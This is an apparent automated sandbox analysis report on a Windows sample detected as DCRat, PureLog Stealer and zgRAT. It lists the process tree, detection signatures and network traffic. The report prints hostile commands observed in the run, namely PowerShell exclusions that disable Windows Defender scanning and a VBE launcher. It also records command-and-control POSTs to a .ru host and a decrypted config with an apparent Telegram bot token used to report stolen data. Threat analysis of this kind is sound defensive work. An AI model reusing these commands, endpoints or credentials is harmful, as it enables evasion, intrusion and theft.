Edit tour

Windows Analysis Report
Ccp3sJPDXs.exe

Overview

General Information

Sample name:	Ccp3sJPDXs.exe renamed because original name is a hash value
Original sample name:	3e27b10ac7aa4c46437a300fb3ea5bdf.exe
Analysis ID:	1631230
MD5:	3e27b10ac7aa4c46437a300fb3ea5bdf
SHA1:	12d7c8cc0062c6a3c7c43a798cc372f4550387d2
SHA256:	64d47e7c05d73ded8c5e3e88195f1173477e55527ad064aca606ef80fda9a38d
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

Adds a directory exclusion to Windows Defender

Drops PE files to the user root directory

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious execution chain found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Ccp3sJPDXs.exe (PID: 4268 cmdline: "C:\Users\user\Desktop\Ccp3sJPDXs.exe" MD5: 3E27B10AC7AA4C46437A300FB3EA5BDF)

wscript.exe (PID: 4816 cmdline: "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 4476 cmdline: C:\Windows\system32\cmd.exe /c ""C:\SavesHost\5QThzOH4GoufqMvWEaCGmEpHUrBKeNi1rE7wtsMJtk.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Blockbrowser.exe (PID: 4368 cmdline: "C:\SavesHost/Blockbrowser.exe" MD5: 497FE9F6B69ACEB2358177C4DF4DE1FE)

powershell.exe (PID: 6208 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7792 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 1988 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows media player\C1lzS0DukHxxFP1s.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5260 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\SgrmBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\0ZuAkTjxKX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4816 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\ZI0Zcb1pDT.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 5472 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\Blockbrowser.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7428 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7600 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7716 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

8Kh5jgTdnc69SVsXvfN.exe (PID: 7940 cmdline: "C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe" MD5: 497FE9F6B69ACEB2358177C4DF4DE1FE)

conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Ccp3sJPDXs.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
Ccp3sJPDXs.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\SavesHost\Blockbrowser.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\SavesHost\Blockbrowser.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\ZI0Zcb1pDT.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\ZI0Zcb1pDT.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\SavesHost\SgrmBroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\SavesHost\SgrmBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Public\Documents\0ZuAkTjxKX.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\Public\Documents\0ZuAkTjxKX.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000005.00000000.2248447205.0000000000372000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2196011939.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000019.00000002.3493949668.00000000034F2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000019.00000002.3493949668.000000000319A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.2195365326.00000000067A7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.2337229125.0000000012991000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Blockbrowser.exe PID: 4368	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: 8Kh5jgTdnc69SVsXvfN.exe PID: 7940	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.Ccp3sJPDXs.exe.70024ca.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.Ccp3sJPDXs.exe.70024ca.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.0.Blockbrowser.exe.370000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.Blockbrowser.exe.370000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\SavesHost/Blockbrowser.exe", ParentImage: C:\SavesHost\Blockbrowser.exe, ParentProcessId: 4368, ParentProcessName: Blockbrowser.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', ProcessId: 6208, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Ccp3sJPDXs.exe", ParentImage: C:\Users\user\Desktop\Ccp3sJPDXs.exe, ParentProcessId: 4268, ParentProcessName: Ccp3sJPDXs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\SavesHost\6kXFj.vbe" , ProcessId: 4816, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\SavesHost/Blockbrowser.exe", ParentImage: C:\SavesHost\Blockbrowser.exe, ParentProcessId: 4368, ParentProcessName: Blockbrowser.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe', ProcessId: 6208, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T20:21:57.694330+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49753	188.114.96.3	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://asdff123fsdafasdf.ru/packetLowGeoProtectCentral.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\SnwWbCTA.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\Public\Documents\0ZuAkTjxKX.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\SavesHost\6kXFj.vbe	Avira: detection malicious, Label: VBS/Runner.VPA
Source: C:\SavesHost\SgrmBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\JRXzWseY.log	Avira: detection malicious, Label: TR/Agent.egqpz
Source: C:\Users\user\Desktop\Opngnglp.log	Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\SavesHost\Blockbrowser.exe	Avira: detection malicious, Label: HEUR/AGEN.1339906
Source: C:\Users\user\Desktop\NzeXyGEM.log	Avira: detection malicious, Label: HEUR/AGEN.1362695

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe	ReversingLabs: Detection: 73%
Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe	ReversingLabs: Detection: 73%
Source: C:\SavesHost\Blockbrowser.exe	ReversingLabs: Detection: 73%
Source: C:\SavesHost\SgrmBroker.exe	ReversingLabs: Detection: 73%
Source: C:\Users\Public\Documents\0ZuAkTjxKX.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\JRXzWseY.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\Opngnglp.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\OvRyOCaQ.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\TcFfQdBd.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\UQJnCrwb.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\UgLFMzEy.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\XnIOiRzu.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\ZEamenMP.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\apvwEADp.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\bGNUAWQL.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\eOeVwbKg.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ezcDmTCJ.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\hHZMHlwF.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\lgJkAMCv.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\sCWCXWYE.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\slPjJBeC.log	ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\uaYsybMf.log	ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\unCSekjx.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\ZI0Zcb1pDT.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: Ccp3sJPDXs.exe	Virustotal: Detection: 76%			Perma Link
Source: Ccp3sJPDXs.exe	ReversingLabs: Detection: 68%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.2337229125.0000000012991000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"TelegramNotifer":{"chatid":"6441298966","bottoken":"8105473573:AAFS3hCyzLZYjLCkNjMRTWl8sUp_NMBZ2oU","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"False","sendloginfostealer":"False","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"}}
Source: 00000005.00000002.2337229125.0000000012991000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-3OxsSTgLxBT4yfXwdLEr","0","","1","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]

Source: Ccp3sJPDXs.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Ccp3sJPDXs.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Ccp3sJPDXs.exe

Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_007DA69B
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_007EC220
Source: C:\Users\user\Desktop\Ccp3sJPDXs.exe	Code function: 0_2_007FB348 FindFirstFileExA,	0_2_007FB348

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49753 -> 188.114.96.3:80

Source: global traffic

TCP traffic: 192.168.2.5:60918 -> 162.159.36.2:53

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
